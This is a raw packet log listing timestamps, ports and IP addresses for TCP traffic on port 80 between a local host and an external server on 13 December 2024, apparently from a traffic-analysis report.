Dec 13, 2024 01:37:07.141402006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.141519070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.141625881 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.229605913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.229660988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.229861975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.231180906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.231295109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.231406927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.234550953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.234652996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.234761953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.237900019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.237998009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.238109112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.241174936 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.241292953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.241410971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.244406939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.244575024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.244679928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.247587919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.247608900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.247735977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.250664949 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.250781059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.250885010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.253703117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.253812075 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.253911972 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.256617069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.256752968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.256860971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.259526968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.259671926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.259780884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.262357950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.262495995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.262589931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.265189886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.265383959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.265476942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.267968893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.268085957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.268182993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.270684004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.270874977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.270966053 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.273426056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.273583889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.273679018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.276129007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.276268959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.276359081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.278853893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.278987885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.279078960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.281579018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.281702042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.281795025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.284359932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.284472942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.284698009 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.287003994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.287187099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.287292004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.289748907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.289844990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.289937973 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.292478085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.292643070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.292737007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.295164108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.295337915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.295459032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.297902107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.298028946 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.298113108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.300611019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.300781965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.300874949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.303337097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.303472996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.303572893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.306044102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.306174994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.306271076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.308794975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.308888912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.308990002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.311500072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.311609030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.311705112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.314203024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.314318895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.314414978 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.316992998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.317040920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.317148924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.319659948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.319775105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.319869995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.322362900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.322525978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.322630882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.325126886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.325237036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.325341940 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.327857971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.327958107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.328241110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.330569029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.330708027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.330815077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.333271980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.333373070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.333472013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.335972071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.336067915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.336167097 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.338690996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.338804007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.338906050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.341432095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.341593981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.341696024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.344130993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.344253063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.344352007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.346884966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.346976995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.347084999 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.349602938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.349716902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.349822044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.352349043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.352477074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.352574110 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.355082035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.355237007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.355346918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.357780933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.357888937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.358000040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.360481024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.360610008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.360714912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.363215923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.363385916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.363493919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.365914106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.365981102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.366079092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.422097921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.422214031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.422422886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.423083067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.423219919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.423260927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.425259113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.425400972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.425443888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.427401066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.427532911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.427586079 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.429511070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.429619074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.429667950 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.431610107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.431720018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.431766033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.433653116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.433789968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.433836937 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.435748100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.435837030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.435885906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.437707901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.437886953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.437937975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.439659119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.439785004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.439831018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.441598892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.441715956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.441762924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.443536043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.443653107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.443757057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.445411921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.445547104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.445642948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.447344065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.447465897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.447601080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.449191093 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.449310064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.449415922 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.451046944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.451225042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.451328993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.452893972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.452997923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.453103065 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.454765081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.454818010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.454931021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.456470966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.456588984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.456705093 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.458262920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.458415031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.458513975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.460021019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.460242033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.460386992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.461775064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.461884022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.462059975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.463512897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.463632107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.463794947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.465281963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.465368986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.465418100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.466960907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.467152119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.467252016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.468667030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.468796015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.468890905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.470343113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.470453978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.470549107 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.472028017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.472160101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.472270966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.473683119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.473788977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.473885059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.475390911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.475445032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.475492954 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.477030039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.477125883 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.477176905 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.478641033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.478766918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.478816032 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.480267048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.480412006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.480463028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.481899977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.482059002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.482115030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.482908010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.482978106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.483028889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.483884096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.484003067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.484055996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.484853029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.485038042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.485090971 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.485856056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.485963106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.486017942 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.486831903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.486969948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.487021923 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.487792969 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.487947941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.488003969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.488744974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.488887072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.488934994 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.489754915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.489870071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.489923000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.490724087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.490864038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.490911961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.491657972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.491799116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.491858959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.492633104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.492778063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.492826939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.493626118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.493751049 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.493804932 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.494647026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.494896889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.494955063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.495564938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.495690107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.495743036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.496558905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.496658087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.496709108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.497498989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.497641087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.497693062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.498493910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.498529911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.498579979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.613965988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.613992929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.614145041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.614295006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.614422083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.614469051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.615065098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.615176916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.615223885 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.616044044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.616167068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.616214991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.617006063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.617146015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.617196083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.617969036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.618083000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.618129015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.618902922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.619023085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.619067907 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.619838953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.619966030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.620063066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.620768070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.620851994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.620946884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.621656895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.621757030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.621804953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.622574091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.622684956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:07.622734070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:07.623498917 CET	80	49707	185.81.68.147	192.168.2.5
